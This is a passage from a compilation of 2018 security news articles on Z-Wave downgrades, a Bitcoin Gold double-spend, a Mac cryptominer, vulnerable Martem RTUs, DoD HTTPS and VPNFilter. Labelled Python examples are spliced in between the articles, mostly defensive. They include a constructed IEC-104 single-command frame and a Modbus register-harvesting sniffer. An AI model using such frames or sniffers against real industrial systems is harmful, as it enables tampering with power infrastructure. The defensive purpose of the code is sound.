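    ctrl = [S0, S2_UNAUTH, S2_AUTH, S2_ACCESS]
    print(pair(ctrl, [S0, S2_AUTH], key, attacker_in_range=False))
    print(pair(ctrl, [S0, S2_AUTH], key, attacker_in_range=True))
```

The defensive observation the simulation makes concrete: a controller that remembers what a node originally advertised, or that refuses S0 altogether for locks and other access-control devices, turns the downgrade into a visible failure rather than a silent one, which is the warning Silicon Labs says the S2 controller raises.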

The hacker needs to be present during the initial pairing process to perform the downgrade, but Pen Test Partners pointed out that the attacker could use a battery-powered hacking device that is left outside the targeted property for an extended period of time, waiting for the pairing process to be initialized.

“The risk is mitigated as one has to be present during the pairing process, but the Z-Wave RF range is significant. We’re investigating whether it might be possible to de-authenticate a Z-Wave client device, but that’s work in progress,” researchers explained.

It turns out that a variant of this downgrade attack was discovered last year by cybersecurity consulting firm SensePost, but the vendor told experts at the time that this was by design and needed for backwards compatibility.

In a blog post published on Wednesday, Silicon Labs assured users that the risk is low and highlighted that it’s not aware of any real-world exploitation.

“While it’s possible that an attacker could intercept the S0 encrypted key exchange frame and decipher it using the hardcoded key, this is only possible during the initial set-up or reinstallation of the device,” Silicon Labs said. “To do this, the attacker would need to be within close proximity of the device during the very moment the device is installed - an extremely small window of opportunity. Furthermore, Z-Wave devices can switch their radio to low power transmission mode during key exchange process to make packet interception attack much more difficult.”

The company added, “It would not be possible to execute an attack without the homeowner becoming aware because they would receive a warning from the S2 controller during the pairing process.”


Bitcoin Gold hit by double-spend attack, exchanges lose over $18 million
25.5.2018 securityaffairs Cryptocurrency

An unknown attacker netted more than $18 million worth of Bitcoin Gold (BTG) by mounting "double spend" attacks against exchanges on the Bitcoin Gold network.
The attacks started on May 18. The attacker used a large number of servers to take control of the majority of the Bitcoin Gold network's hashrate, a technique known as a "51% attack," which lets him rewrite the most recent blocks of the blockchain.

Bitcoin Gold ranks as the 26th-largest cryptocurrency, the overall circulating market cap is $827 million.

Bitcoin Gold's director of communications, Edward Iskra, promptly notified users of the attacks, confirming that a malicious miner was using the exploit to steal funds from cryptocurrency exchanges in double-spend attacks. Iskra explained that the victims were not end users; the attacker targeted exchanges.

“An unknown party with access to very large amounts of hashpower is trying to use “51% attacks” to perform “double spend” attacks to steal money from Exchanges. We have been advising all exchanges to increase confirmations and carefully review large deposits.” wrote Edward Iskra, Director of Communications.

“There is no risk to typical users or to existing funds being held. The only parties at risk are those currently accepting large payments directly from the attacker. Exchanges are the primary targets.”

With a majority of the hashrate, the attacker can mine a private chain faster than the honest network and publish it later to replace the most recent blocks, reversing transactions that had already been confirmed; the same coins can therefore be spent twice.

The Bitcoin Gold team explained that, because such an attack is expensive to sustain, the only way to profit was to target exchanges, which credit large deposits automatically and let the attacker withdraw quickly.

The attacker monetized the attack by depositing large amounts of BTG at exchanges while, on his private chain, sending the same coins to a wallet under his control; once the private chain was published, the exchange deposits vanished from the ledger but the withdrawals had already been made.

“The cost of mounting an ongoing attack is high. Because the cost is high, the attacker can only profit if they can quickly get something of high value from a fake deposit,” states Bitcoin Gold team. “A party like an Exchange may accept large deposits automatically, allow the user to trade into a different coin quickly, and then withdraw automatically. This is why they are targeting Exchanges.”

With this attack scheme, the hacker was able to withdraw funds before being discovered.

To mitigate the attacks, exchanges raised the number of confirmations a deposit must have before it is credited.

“Requiring more confirmations greatly increases safety. Until now, some Exchanges were operating with less than five confirmations required. We have been urging higher limits to prevent such an attack, and urging manual review of large deposits of BTG before clearing the funds for trading.” continues the advisory published by Bitcoin Gold.
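What "more confirmations" buys an exchange, as an added example that is not Bitcoin Gold's code: the attacker-catch-up probability from the Bitcoin whitepaper, applied to a deposit policy. `q` is the attacker's share of the hashrate and `z` the confirmations a deposit has when it is credited. The deposit thresholds in `deposit_decision` are assumptions for the example.

```python
# Added example (not Bitcoin Gold's code): how many confirmations an exchange
# should demand, using the attacker-catch-up probability from the Bitcoin
# whitepaper. q is the attacker's share of the hashrate; z the number of
# blocks (confirmations) the honest chain is ahead when the deposit is credited.
import math


def attacker_success_probability(q: float, z: int) -> float:
    """Probability that an attacker with hashrate fraction q eventually
    replaces a chain that is z blocks ahead. With q >= 0.5 (a 51% attack)
    the attacker always catches up, so no confirmation count is safe."""
    if q >= 0.5:
        return 1.0
    p = 1.0 - q
    lam = z * (q / p)
    total = 1.0
    for k in range(z + 1):              # k = blocks the attacker mined meanwhile
        poisson = math.exp(-lam)
        for i in range(1, k + 1):
            poisson *= lam / i
        total -= poisson * (1 - (q / p) ** (z - k))
    return max(total, 0.0)


def confirmations_needed(q: float, max_risk: float, limit: int = 2000):
    """Smallest z for which the reversal probability drops below max_risk,
    or None when the attacker holds a majority and no z suffices."""
    if q >= 0.5:
        return None
    for z in range(limit + 1):
        if attacker_success_probability(q, z) < max_risk:
            return z
    return None


def deposit_decision(confirmations: int, attacker_share: float,
                     amount_btg: float, manual_review_above: float = 1000.0,
                     max_risk: float = 0.001) -> str:
    """Exchange-side policy mirroring the advisory: large deposits go to a
    human, smaller ones are credited only once the reversal risk is low.
    The thresholds are assumptions for the example."""
    if amount_btg > manual_review_above:
        return "hold: manual review"
    needed = confirmations_needed(attacker_share, max_risk)
    if needed is None:
        return "hold: majority attacker, confirmations cannot make this safe"
    if confirmations >= needed:
        return "credit"
    return f"wait: {needed - confirmations} more confirmation(s)"


if __name__ == "__main__":
    for share in (0.10, 0.30, 0.40, 0.51):
        print(f"attacker share {share:.0%}: confirmations for <0.1% risk = "
              f"{confirmations_needed(share, 0.001)}")
```

The printed table goes from 5 confirmations at a 10% attacker to 24 at 30% and 89 at 40%, then `None` at 51%: raising the confirmation count, as the exchanges did, increases the attacker's cost and exposure time, but against a genuine majority it is a delay rather than a guarantee, which is why the advisory also asked for manual review of large deposits.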

“It appears that actions on the part of the exchanges have deterred the attacker, for now.”

The Bitcoin Gold team was able to follow the stolen funds from exchanges to the BTG address GTNjvCGssb2rbLnDV1xxsHmunQdvXnY2Ft, the hacker transferred more than 388,000 BTG coins (roughly $18 million).

BTG double-spend

Even though end users are not affected, the attacks could have severe consequences for the exchanges, which could even go bankrupt.

According to one of the exchanges involved in the attacks, the mysterious attacker is the same actor that attempted a double-spend attack on the original Bitcoin network in the past.

“One of the targeted Exchanges reported that they strongly believe this attacker attempted to hit them with a double-spend of BTC in the past. In their words, “we are 100% sure that it is the same person, we found many associations between the accounts.” concluded Iskra.


Many users reported in the past few weeks their Macs have been infected with a new Monero Miner
25.5.2018 securityaffairs Cryptocurrency

In the past few weeks many Mac users have been infected with a new Monero miner; the infections confirm that this kind of malware is on the rise.
According to researchers at Malwarebytes, the owners of the infected Macs noticed that a process named “mshelper” was consuming a lot of CPU power and draining their batteries.

“The malware became public knowledge in a post on Apple’s discussion forums, where the “mshelper” process was found to be the culprit. Digging deeper, it was discovered that there were a couple other suspicious processes installed as well. We went searching and found copies of these files.” reads the analysis published by MalwareBytes.

“The malware is mining for Monero cryptocurrency. Here’s a breakdown of its components.”

Monero Miner

The malware is most likely installed by fake Adobe Flash Player installers, by downloads from piracy websites, or by bait documents crafted to trick victims into opening them.

According to the experts, the launcher, a file named pplauncher, is kept active by a launch daemon (com.pplauncher.plist); since installing a launch daemon means writing to /Library/LaunchDaemons, this suggests the dropper had root privileges. The launcher was developed in Go (Golang) and is relatively large for what it does (3.5 MB).

“Using Golang introduces significant overhead, resulting in a binary file containing more than 23,000 functions. Using this for what appears to be simple functionality is probably a sign that the person who created it is not particularly familiar with Macs.” continues the analysis published by Malwarebytes.

The launcher creates the miner process mshelper which is installed in the following location:

/tmp/mshelper/mshelper
The miner is an older version of the legitimate and open source mining tool named XMRig.

This malware is not particularly dangerous, but in case the infected system has a problem such as damaged fans or dust-clogged vents it could cause overheating.

“Although the mshelper process is actually a legitimate piece of software being abused, it should still be removed along with the rest of the malware,” concludes Malwarebytes.

“This malware follows other cryptominers for macOS, such as Pwnet, CpuMeaner, and CreativeUpdate. I’d rather be infected with a cryptominer than some other kind of malware, but that doesn’t make it a good thing.”

Users can manually remove the malware by deleting these two files and rebooting their devices:

/Library/LaunchDaemons/com.pplauncher.plist
/Library/Application Support/pplauncher/pplauncher


Macs Infected With New Monero-Mining Malware
24.5.2018 securityweek  Cryptocurrency

Many Mac users reported in the past few weeks that a process named “mshelper” had been eating up a lot of CPU power and draining their batteries. It turns out that the process is associated with a piece of malware designed to mine for Monero (XMR) cryptocurrency.

Researchers at Malwarebytes have analyzed the mshelper malware and while they haven’t been able to precisely determine how it’s distributed, they believe fake Flash Player installers, malicious documents or pirated software are likely involved rather than some other, more sophisticated, method.

Experts noticed that the launcher, a file named pplauncher, is kept active by a launch daemon (com.pplauncher.plist), which suggests that the dropper likely had root privileges on the compromised system. The launcher was developed in Golang and it's relatively large (3.5 MB).

“Using Golang introduces significant overhead, resulting in a binary file containing more than 23,000 functions. Using this for what appears to be simple functionality is probably a sign that the person who created it is not particularly familiar with Macs,” explained Malwarebytes’ Thomas Reed.

Once the launcher creates the mshelper process, the compromised device starts mining for Monero cryptocurrency on behalf of the cybercriminals who distribute the malware. The miner itself is a legitimate and open source mining tool named XMRig.

“This malware is not particularly dangerous, unless your Mac has a problem like damaged fans or dust-clogged vents that could cause overheating. Although the mshelper process is actually a legitimate piece of software being abused, it should still be removed along with the rest of the malware,” Reed said.

Based on reports from victims, anti-malware products initially either did not detect the threat at all or they could not completely remove the infection – the malware reappeared after a reboot. Now that news of the malware has spread, security companies have likely updated their products to ensure complete removal.

Alternatively, users can manually remove the malware by deleting these two files and rebooting their devices:

/Library/LaunchDaemons/com.pplauncher.plist

/Library/Application Support/pplauncher/pplauncher

This is not the only cryptocurrency miner delivered recently to Mac users. In February, Malwarebytes reported that a Monero miner had been delivered through malicious versions of applications available through the MacUpdate website.
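A host check for the indicators both this article and the securityaffairs piece above list, as an added example that is not Malwarebytes' code: it parses launchd plists with the standard library and reports any whose file name or program references the pplauncher/mshelper components, then checks the documented paths. A constructed fixture (a fake plist and a placeholder "binary" in a scratch directory) lets it run offline; on a live Mac you would point `find_suspect_daemons` at /Library/LaunchDaemons and `present_iocs` at `/`.

```python
# Added example (not Malwarebytes' code): a small host check for the
# indicators the articles list. It parses launch daemon plists with the
# standard library and reports the ones whose program points at the
# pplauncher/mshelper components. A constructed fixture lets it run offline.
import os
import pathlib
import plistlib
import tempfile

IOC_PATHS = [
    "/Library/LaunchDaemons/com.pplauncher.plist",
    "/Library/Application Support/pplauncher/pplauncher",
    "/tmp/mshelper/mshelper",
]
IOC_NAMES = ("pplauncher", "mshelper")


def daemon_program(plist_path):
    """Return the executable a launchd plist starts (Program or argv[0])."""
    with open(plist_path, "rb") as fh:
        plist = plistlib.load(fh)
    if plist.get("Program"):
        return plist["Program"]
    args = plist.get("ProgramArguments") or []
    return args[0] if args else None


def find_suspect_daemons(launch_daemons_dir):
    """Scan a LaunchDaemons directory; return (plist, program) pairs whose
    file name or program references the known component names."""
    hits = []
    for entry in sorted(pathlib.Path(launch_daemons_dir).glob("*.plist")):
        try:
            program = daemon_program(entry)
        except (plistlib.InvalidFileException, OSError):
            continue  # unreadable plist: skip rather than abort the sweep
        by_name = any(n in entry.name for n in IOC_NAMES)
        by_prog = program is not None and any(n in program for n in IOC_NAMES)
        if by_name or by_prog:
            hits.append((str(entry), program))
    return hits


def present_iocs(root="/"):
    """Which of the documented file paths exist under root ('/' on a live
    Mac; a scratch directory in the offline demo)."""
    return [p for p in IOC_PATHS
            if os.path.exists(os.path.join(root, p.lstrip("/")))]


def make_sample_infection(root):
    """Constructed fixture mirroring the documented layout, for offline runs."""
    daemons = pathlib.Path(root, "Library/LaunchDaemons")
    daemons.mkdir(parents=True, exist_ok=True)
    launcher = pathlib.Path(root, "Library/Application Support/pplauncher/pplauncher")
    launcher.parent.mkdir(parents=True, exist_ok=True)
    launcher.write_bytes(b"\xcf\xfa\xed\xfe")  # Mach-O magic only, not a real binary
    with open(daemons / "com.pplauncher.plist", "wb") as fh:
        plistlib.dump({"Label": "com.pplauncher",
                       "ProgramArguments": [str(launcher)],
                       "RunAtLoad": True, "KeepAlive": True}, fh)
    with open(daemons / "com.apple.example.plist", "wb") as fh:  # benign control
        plistlib.dump({"Label": "com.apple.example",
                       "Program": "/usr/libexec/example"}, fh)
    return root


def demo_scan():
    """Build the fixture in a scratch directory and run both checks over it."""
    scratch = make_sample_infection(tempfile.mkdtemp())
    hits = find_suspect_daemons(os.path.join(scratch, "Library/LaunchDaemons"))
    return hits, present_iocs(scratch)


if __name__ == "__main__":
    print(demo_scan())
```

Removal is still the two-file deletion and reboot the article gives; the value of parsing the plist rather than matching file names alone is that a renamed label file still points at the same launcher path, and `KeepAlive` explains why killing mshelper by hand does not stick.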


Vulnerabilities Found in RTUs Used by European Energy Firms
24.5.2018 securityweek  Vulnerability

Several critical and high severity vulnerabilities have been found in remote terminal unit (RTU) modules designed for the energy sector and used in various European countries.

Bernhards Blumbergs and Arturs Danilevics of Latvia’s CERT.LV discovered that Telem-GW6 and Telem-GWM products made by Estonia-based Martem are affected by vulnerabilities that can be exploited to cause a denial-of-service (DoS) condition and execute arbitrary code and commands.

Martem, which specializes in telecontrol systems for supervising and controlling electrical distribution networks, says its clients are electrical distribution firms, and industrial and transportation companies that have their own electrical networks. Martem’s main customers are located in Estonia, Lithuania, Latvia and Finland.

The company said its RTUs were used earlier this year in a cyber defense exercise organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE).

The vulnerable products are data concentrators that collect data from peripheral devices in the substation. The RTUs impacted by the security holes found by Blumbergs and Danilevics are GW6 version 2018.04.18-linux_4-01-601cb47 and prior, and GWM version 2018.04.18-linux_4-01-601cb47 and prior.

The most serious of the flaws, with a CVSS score of 10, is CVE-2018-10603, which allows a rogue node on the network to send unauthorized commands and take control of the industrial process. The vulnerability is caused by the lack of authentication for commands sent over IEC 60870-5-104 (IEC-104), a protocol standard for telecontrol, teleprotection and telecommunications for electric power systems: the RTU executes any well-formed command frame regardless of its source.

Another security hole, rated “high severity” and tracked as CVE-2018-10607, has been classified as an uncontrolled resource consumption issue. According to ICS-CERT, a DoS condition can be caused within the industrial process control channel by creating new connections to one or more input/output accessories (IOAs) and not closing them properly.

Vulnerabilities found in Martem RTUs

The last vulnerability, tracked as CVE-2018-10609 and also classified as “high severity,” is a cross-site scripting (XSS) bug in the device's web interface that can be exploited to run arbitrary script in the browser of the targeted user, with that user's privileges on the interface.

According to ICS-CERT, the vulnerabilities can be exploited remotely even by an attacker with a low skill level.

The vendor says the XSS flaw will be patched with the release of firmware version 2.0.73, which is expected to become available sometime after May 23. Attacks can also be prevented by disabling the web server if it’s not needed, or protecting the web server with a strong password to avoid unauthorized access.

The other two vulnerabilities can be mitigated through configuration changes, including using VPNs, using a firewall for packet filtering, and configuring the RTU so that only trusted systems can send commands.
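What "no authentication for IEC-104 commands" means on the wire, and the network-side control the advisory recommends, as an added example that is neither Martem's nor CERT.LV's code: a minimal parser for an IEC 60870-5-104 APDU pulls out the ASDU type, cause of transmission and object address, and a monitor then flags control commands from any peer outside a configured allowlist of masters. The sample frames and the IP addresses are constructed for this example.

```python
# Added example (not Martem's or CERT.LV's code): parse an IEC 60870-5-104
# APDU and flag control commands from untrusted peers. Frames are constructed.

# ASDU type identifiers that change process state (IEC 60870-5-101/104).
CONTROL_TYPES = {
    45: "C_SC_NA_1 single command",
    46: "C_DC_NA_1 double command",
    47: "C_RC_NA_1 regulating step command",
    48: "C_SE_NA_1 set point, normalised",
    49: "C_SE_NB_1 set point, scaled",
    50: "C_SE_NC_1 set point, float",
    51: "C_BO_NA_1 bitstring of 32 bits",
    58: "C_SC_TA_1 single command with time tag",
    59: "C_DC_TA_1 double command with time tag",
    60: "C_RC_TA_1 regulating step command with time tag",
    61: "C_SE_TA_1 set point, normalised, with time tag",
    62: "C_SE_TB_1 set point, scaled, with time tag",
    63: "C_SE_TC_1 set point, float, with time tag",
    64: "C_BO_TA_1 bitstring with time tag",
}
COT_ACTIVATION = 6


def parse_apdu(data: bytes) -> dict:
    """Parse one APDU. I-format frames carry an ASDU; S and U frames are
    flow control and are returned with just their format."""
    if len(data) < 6 or data[0] != 0x68:
        raise ValueError("not an IEC-104 APDU (missing 0x68 start byte)")
    if data[1] != len(data) - 2:
        raise ValueError("APDU length field does not match frame size")
    ctrl = data[2:6]
    if ctrl[0] & 0x01 == 0:
        fmt = "I"
    elif ctrl[0] & 0x03 == 0x01:
        fmt = "S"
    else:
        fmt = "U"
    if fmt != "I":
        return {"format": fmt}
    asdu = data[6:]
    if len(asdu) < 9:
        raise ValueError("ASDU too short")
    return {
        "format": "I",
        "type_id": asdu[0],
        "num_objects": asdu[1] & 0x7F,
        "cot": asdu[2] & 0x3F,                                  # cause of transmission
        "originator": asdu[3],
        "common_address": asdu[4] | (asdu[5] << 8),
        "ioa": asdu[6] | (asdu[7] << 8) | (asdu[8] << 16),      # information object address
        "payload": bytes(asdu[9:]),
    }


def is_control_command(apdu: dict) -> bool:
    return apdu.get("format") == "I" and apdu["type_id"] in CONTROL_TYPES


def check_command(src_ip: str, data: bytes, trusted_masters: set) -> str:
    """Verdict for one frame, as a firewall or IDS in front of the RTU would
    produce; the RTU itself (CVE-2018-10603) executes any well-formed command."""
    apdu = parse_apdu(data)
    if not is_control_command(apdu):
        return "ok: not a control command"
    what = CONTROL_TYPES[apdu["type_id"]]
    where = f"CA={apdu['common_address']} IOA={apdu['ioa']}"
    if src_ip not in trusted_masters:
        return f"ALERT: {what} ({where}) from untrusted {src_ip}; drop"
    if apdu["cot"] != COT_ACTIVATION:
        return f"warn: {what} ({where}) from {src_ip} with unexpected COT {apdu['cot']}"
    return f"ok: {what} ({where}) from trusted {src_ip}"


# Constructed frames (send/receive sequence numbers zero).
# Single command, ON, activation, common address 1, IOA 1:
SINGLE_CMD_ON = bytes.fromhex("680e 0000 0000 2d01 0600 0100 010000 01")
# Station interrogation (type 100), which reads but does not control:
INTERROGATION = bytes.fromhex("680e 0000 0000 6401 0600 0100 000000 14")
# S-format supervisory frame:
S_FRAME = bytes.fromhex("6804 0100 0000")

if __name__ == "__main__":
    trusted = {"10.0.0.5"}
    print(check_command("10.0.0.5", SINGLE_CMD_ON, trusted))
    print(check_command("10.0.0.99", SINGLE_CMD_ON, trusted))
    print(check_command("10.0.0.99", INTERROGATION, trusted))
    print(parse_apdu(S_FRAME))
```

The allowlist is exactly the "only trusted systems can send commands" mitigation; because the protocol carries no authentication, source address is the only handle a filter has, which is why the advisory pairs it with a VPN so that address cannot simply be spoofed from the substation LAN.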


Senator Asks DoD to Secure Its Websites
24.5.2018 securityweek BigBrothers

Senator Ron Wyden (D-Ore.) on Tuesday asked the chief information officer at the U.S. Department of Defense (DoD) to take immediate action to ensure that the organization’s websites use HTTPS.

The senator noted that some of the DoD’s websites, such as those of the NSA, the Army and the Air Force, do use HTTPS by default with certificates trusted by major web browsers, but many other sites either don’t use HTTPS at all or rely on certificates issued by the DoD Root Certificate Authority. Because that root is not in the trust stores shipped with major browsers, DoD-issued certificates trigger security warnings.

The list of websites that do not use HTTPS includes the ones of the Navy, Marines, and even the CIO’s official website hosted at dodcio.defense.gov.

Sen. Wyden believes the security warnings displayed for HTTP sites will “erode the public’s trust in the Department and its ability to defend against sophisticated cyber threats” and “actively degrade the public’s security by teaching users to treat security warnings as irrelevant.”

The lawmaker pointed out that memo M-15-13, issued by the Office of Management and Budget (OMB) in 2015, requires all federal agencies to secure their websites by enabling HTTPS and enforcing HSTS. Furthermore, Binding Operational Directive 18-01, issued last year by the Department of Homeland Security (DHS), requires all agencies to adopt web and email security technologies such as HTTPS, DMARC and STARTTLS.
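An offline checker for the two requirements at issue, HTTPS with a browser-trusted certificate and HSTS, as an added example that is not from the senator's letter or any DoD tooling. It takes the response metadata a scanner would already have collected for a host; the hostnames and responses below are constructed, and the one-year minimum for the HSTS max-age is the value this example assumes.

```python
# Added example (not DoD or OMB tooling): evaluate a site's HTTPS/HSTS posture
# from collected response metadata. Sample inputs are constructed.
ONE_YEAR = 365 * 24 * 3600


def parse_hsts(value: str) -> dict:
    """Parse a Strict-Transport-Security header into its directives."""
    out = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            try:
                out["max_age"] = int(val.strip().strip('"'))
            except ValueError:
                out["max_age"] = None   # malformed value: treat as absent
        elif name == "includesubdomains":
            out["include_subdomains"] = True
        elif name == "preload":
            out["preload"] = True
    return out


def assess_site(host, http_response, https_response, cert_trusted,
                min_max_age=ONE_YEAR):
    """Return a list of findings (empty means compliant).

    http_response / https_response: (status, headers) tuples, or None if the
    port did not answer. cert_trusted: whether the HTTPS certificate chains to
    a root in major browsers' trust stores (an agency-only root does not).
    """
    findings = []
    if https_response is None:
        return [f"{host}: HTTPS not offered"]
    if not cert_trusted:
        findings.append(f"{host}: certificate not trusted by major browsers")
    _status, headers = https_response
    headers = {k.lower(): v for k, v in headers.items()}
    hsts = headers.get("strict-transport-security")
    if hsts is None:
        findings.append(f"{host}: HSTS header missing")
    else:
        parsed = parse_hsts(hsts)
        if parsed["max_age"] is None or parsed["max_age"] < min_max_age:
            findings.append(f"{host}: HSTS max-age below {min_max_age} seconds")
    if http_response is not None:
        h_status, h_headers = http_response
        location = {k.lower(): v for k, v in h_headers.items()}.get("location", "")
        if h_status not in (301, 302, 307, 308) or not location.lower().startswith("https://"):
            findings.append(f"{host}: plain HTTP served without redirect to HTTPS")
    return findings


# Constructed samples (placeholder hostnames).
COMPLIANT = dict(
    host="www.example.mil",
    http_response=(301, {"Location": "https://www.example.mil/"}),
    https_response=(200, {"Strict-Transport-Security":
                          "max-age=31536000; includeSubDomains; preload"}),
    cert_trusted=True)
NONCOMPLIANT = dict(
    host="legacy.example.mil",
    http_response=(200, {"Content-Type": "text/html"}),
    https_response=(200, {"Content-Type": "text/html"}),
    cert_trusted=False)

if __name__ == "__main__":
    for sample in (COMPLIANT, NONCOMPLIANT):
        print(sample["host"], assess_site(**sample) or ["compliant"])
```

The three findings the non-compliant sample produces are the three complaints in the letter: an untrusted certificate, no HSTS, and plain HTTP still being served. The `cert_trusted` input is deliberately a fact the caller establishes with a real trust store rather than something inferred from headers.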

The senator also noted in his letter that Google’s Chrome web browser will soon start marking HTTP pages with a red “Not Secure” warning.

The CIO of the DoD, Dana Deasy, has been instructed to direct all agencies to enable HTTPS with HSTS on all public web services, obtain and deploy certificates trusted by major browsers, and evaluate the use of shorter-lived certificates such as the ones offered by Let’s Encrypt. An action plan and progress report must be provided by the DoD by July 20.

The senator is well regarded by many in the cybersecurity industry for his initiatives. One of his advisers is privacy researcher and activist Christopher Soghoian, formerly principal technologist at the American Civil Liberties Union.


Massive Russia-Linked Botnet Raises Concerns of New Attack on Ukraine
24.5.2018 securityweek  BotNet

Russia-linked VPNFilter malware infects 500,000 devices in preparation for a new Ukraine attack

Russia may be preparing for another massive cyberattack on Ukraine using a botnet of at least 500,000 compromised routers and network-attached storage (NAS) devices, Cisco’s Talos threat intelligence group reported on Wednesday.

The botnet is powered by a sophisticated piece of malware that researchers have dubbed VPNFilter based on the names of some folders created by the threat. Talos has worked with several other cybersecurity firms and law enforcement agencies to investigate VPNFilter. While the investigation is ongoing, an initial report has been published due to concerns that an attack involving the botnet may be imminent.

Researchers believe a state-sponsored or state-affiliated threat actor is likely behind the attack and Russia has been named the main suspect due to code overlaps with the BlackEnergy malware, which has been attributed by many to the Kremlin.

More than 500,000 hacked devices have been observed across 54 countries, but many infections have been spotted in Ukraine and their number continues to increase. The malware has compromised devices made by Linksys, MikroTik, Netgear, TP-Link and QNAP, and while experts have yet to identify the attack vector they are confident that no zero-day vulnerabilities are involved.

VPNFilter is a modular piece of malware that has a wide range of capabilities. It can intercept data passing through the compromised device, including website credentials, and it can monitor the network for communications over the Modbus SCADA protocol. The malware, which uses Tor to communicate with a control panel, also has destructive capabilities that can be leveraged to make an infected device unusable.

“The destructive capability particularly concerns us. This shows that the actor is willing to burn users' devices to cover up their tracks, going much further than simply removing traces of the malware. If it suited their goals, this command could be executed on a broad scale, potentially rendering hundreds of thousands of devices unusable, disabling internet access for hundreds of thousands of victims worldwide or in a focused region where it suited the actor's purposes,” Talos said in its report.

Researchers are concerned that VPNFilter may be used for another massive attack on Ukraine not only due to the large number of infections and a separate command and control (C&C) infrastructure for devices in this country, but also because there are only a few weeks until Ukraine celebrates its Constitution Day.

Last year, the NotPetya wiper attack was launched on the eve of Ukraine’s Constitution Day. NotPetya has been officially attributed to Russia by the U.S. and other countries and researchers have also linked the malware to BlackEnergy.

The fact that the malware monitors Modbus communications, which are typically used for supervisory control and data acquisition (SCADA) systems, suggests that the attacker may also be targeting industrial control systems (ICS).
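What a sniffer sitting on a compromised router can read out of Modbus/TCP traffic, as an added example that is not Talos code: a parser for the MBAP header and function code, and a collector that builds the register map an eavesdropper learns passively. Modbus carries no authentication or encryption, so the write requests the collector singles out are the ones an attacker could later replay or forge. The capture below is constructed for this example.

```python
# Added example (not Talos code): decode Modbus/TCP request frames and build
# the inventory a passive sniffer obtains. Frames are constructed samples.
import struct
from collections import defaultdict

READ_FUNCTIONS = {1: "Read Coils", 2: "Read Discrete Inputs",
                  3: "Read Holding Registers", 4: "Read Input Registers"}
WRITE_FUNCTIONS = {5: "Write Single Coil", 6: "Write Single Register",
                   15: "Write Multiple Coils", 16: "Write Multiple Registers",
                   22: "Mask Write Register", 23: "Read/Write Multiple Registers"}


def parse_modbus_tcp(frame: bytes) -> dict:
    """Decode the MBAP header and PDU of a request frame."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header + function code")
    transaction, protocol, length, unit = struct.unpack(">HHHB", frame[:7])
    if protocol != 0:
        raise ValueError("protocol identifier must be 0 for Modbus")
    if length != len(frame) - 6:
        raise ValueError("MBAP length does not match frame size")
    function = frame[7]
    data = frame[8:]
    pdu = {"transaction": transaction, "unit": unit, "function": function,
           "is_write": function in WRITE_FUNCTIONS,
           "name": WRITE_FUNCTIONS.get(function) or READ_FUNCTIONS.get(function, "other")}
    if function in (1, 2, 3, 4, 5, 6) and len(data) >= 4:
        address, value = struct.unpack(">HH", data[:4])   # start address + count/value
        pdu["address"] = address
        pdu["value_or_count"] = value
    elif function == 16 and len(data) >= 5:
        address, count, byte_count = struct.unpack(">HHB", data[:5])
        pdu["address"] = address
        pdu["value_or_count"] = count
        pdu["values"] = [v for (v,) in struct.iter_unpack(">H", data[5:5 + byte_count])]
    return pdu


def collect(frames):
    """Passive collection over a capture: which unit/register addresses are
    read or written, plus every value written in the clear."""
    inventory = defaultdict(set)
    writes = []
    for src, frame in frames:
        pdu = parse_modbus_tcp(frame)
        if "address" not in pdu:
            continue
        key = (pdu["unit"], "write" if pdu["is_write"] else "read")
        inventory[key].add(pdu["address"])
        if pdu["is_write"]:
            writes.append((src, pdu["unit"], pdu["address"],
                           pdu.get("values", [pdu["value_or_count"]])))
    return dict(inventory), writes


# Constructed capture: (source IP, request frame).
CAPTURE = [
    ("10.1.1.10", bytes.fromhex("0001 0000 0006 01 03 0000 000a")),  # read 10 holding regs at 0
    ("10.1.1.10", bytes.fromhex("0002 0000 0006 01 06 000a 00ff")),  # write register 10 := 255
    ("10.1.1.10", bytes.fromhex("0003 0000 000b 01 10 0014 0002 04 0001 0002")),  # write regs 20, 21
]

if __name__ == "__main__":
    inventory, writes = collect(CAPTURE)
    print(inventory)
    print(writes)
```

The same parser serves the defender: run over a span port instead of a hijacked router, the `writes` list is the baseline of who legitimately writes to which registers, and any new source or address in it is the alert.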

Threat groups believed to be working for the Russian government have been known to launch attacks on ICS, including the December 2016 attack on Ukraine’s energy sector using a piece of malware tracked as Industroyer (also known as CRASHOVERRIDE). Several other Russia-linked actors have targeted industrial systems, including Dragonfly and Dymalloy.

“VPNFilter is an expansive, robust, highly capable, and dangerous threat that targets devices that are challenging to defend. Its highly modular framework allows for rapid changes to the actor's operational infrastructure, serving their goals of misattribution, intelligence collection, and finding a platform to conduct attacks,” Talos said.


Agari Employs Active Defense to Probe Nigerian Email Scammers
24.5.2018 securityweek  Phishing

Agari, a firm that offers protection against email-borne threats, has spent the last 10 months analyzing the targets, tactics and identities of 10 separate criminal organizations. All ten organizations concentrate on email scam attacks; and nine of the ten are located in Nigeria.

While this does not prove that 90% of email scams come out of Nigeria, it is probably fair to say that Nigeria dominates this vector. The organizations were originally selected via scam emails targeted at Agari customers and blocked by Agari software. But Agari's analysis is far more than just an investigation into known scamware.

Chief scientist Markus Jakobsson told SecurityWeek that he and his team developed a method of gaining access to the scammers' own mailboxes, using what he describes as responsible active defense. The responsible element includes gaining FBI 'acquiescence' on the project. It is described as 'active defense' because it falls short of 'hacking back'. "You could describe it," he told SecurityWeek, "as a process of socially engineering the social engineers."

During the course of the project using this methodology, he and his team captured 78 criminal email accounts belonging to 10 different criminal organizations and containing 59,652 unique emails. In a report (PDF) published Tuesday, Agari was able to analyze the process and progress of email scams rather than just the content of individual scam emails.

Just like cybercriminals globally, the Nigerian scammers are becoming more sophisticated (using, for example, persistent and stealthy malware to penetrate organizations' email accounts), and are beginning to direct their attention against commercial organizations rather than individual computer users. As elsewhere, 'profit' is the motive: business email compromise (BEC) attacks require less individual effort for a much higher return.

Agari's research shows that the average BEC incident nets $35,000 for the criminals. 3.97% of people who answer a BEC email become victims -- and 24% of all email scams are now BEC. In June 2017, the FBI reported that the total worldwide dollar loss to BEC scams was in the region of $5.3 billion.

BEC works by the scammer masquerading as the company president or CEO, and requesting that Finance should send an urgent payment to a customer or business partner. The figures show that it is remarkably successful. But despite its success and despite the higher returns on effort, it is not the most frequent scam. That remains -- from the same criminal organizations -- the romance scam.

